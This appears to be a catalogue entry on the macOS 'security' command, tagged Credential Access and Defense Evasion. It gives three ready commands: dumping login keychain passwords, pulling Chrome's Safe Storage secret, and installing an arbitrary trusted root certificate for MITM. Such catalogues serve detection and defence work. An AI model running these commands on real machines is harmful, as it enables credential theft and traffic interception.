Created by Pratik Jeware (@Pratik-987), Brendan Chamberlain (@infosecb)
security is a command-line utility included in macOS that allows users to interact with the Keychain app. Keychains allow users to manager passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos.
|2023-04-24||Credential Access Defense Evasion||bash chrome certificate|
Dump credentials, keys, certificates, and other senstive information from Keychain
This command will dump keychain passwords from login.keychain
sudo security dump-keychain -d login.keychain
Retrieve Chrome’s “Chrome Safe Storage” password manager secret
This command will retrieve the Chrome Safe Storage password manager secret from the keychain.
security find-generic-password -w -s "Chrome Safe Storage"
Add an arbitrary trusted certificate to aid a MITM attack
This command will add a certificate to the keychain.
security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain bad_cert.crt